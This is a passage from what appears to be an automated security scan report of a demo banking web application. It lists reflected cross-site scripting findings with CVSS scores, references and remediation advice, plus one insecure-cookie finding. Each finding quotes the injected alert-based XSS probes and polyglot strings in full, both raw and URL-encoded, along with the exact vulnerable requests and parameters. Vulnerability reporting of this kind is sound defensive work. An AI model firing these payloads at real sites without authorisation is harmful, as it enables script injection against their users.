http://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%2
F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscrip
t%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650656.00127%29%2F%
2F%3E*%2Falert%2815650656.00127%29%2F* HTTP/1.1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 428 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 429 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00617)//>*/alert(15650642.00617)/*
Detection: An alert was detected containing 15650642.00617
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 430 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00617%29%2F%
2F%3E*%2Falert%2815650642.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 431 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E -
HostName
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 432 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: http://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 433 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 03939398ea63ccaee93295dc28e42282
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 434 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 435 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650659.00037)</script>
Detection: An alert was detected containing 15650659.00037
Request: GET
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 436 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 437 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127
Request: GET
http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 438 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 439 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 440 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 441 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 442 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 443 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 444 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 445 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650659.00947)</script>
Detection: An alert was detected containing 15650659.00947
Request: GET
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net:8080/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 446 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 447 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/index.jsp?content=javascript%3A%2F%2F%
27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2
Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 448 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 449 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - name
Injection: <script>alert(15650660.00467)</script>
Detection: An alert was detected containing 15650660.00467
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 450 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00467%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 451 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 452 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00617%29%2F%
2F%3E*%2Falert%2815650661.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 453 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 454 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650659.00617%29%2F%
2F%3E*%2Falert%2815650659.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 455 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 456 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650642.00127)//>*/alert(15650642.00127)/*
Detection: An alert was detected containing 15650642.00127
Request: GET
https://65.61.137.117/index.jsp?content=javascript%3A%2F%2F%27%
2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscri
pt%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00127%29%2F%
2F%3E*%2Falert%2815650642.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 457 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 458 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00127)//>*/alert(15650661.00127)/*
Detection: An alert was detected containing 15650661.00127
Request: GET
https://demo.testfire.net:8443/index.jsp?content=javascript%3A%2F%2
F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 459 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 460 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650656.00037)</script>
Detection: An alert was detected containing 15650656.00037
Request: GET
http://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%28156506
56.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 461 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 462 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650658.00037)</script>
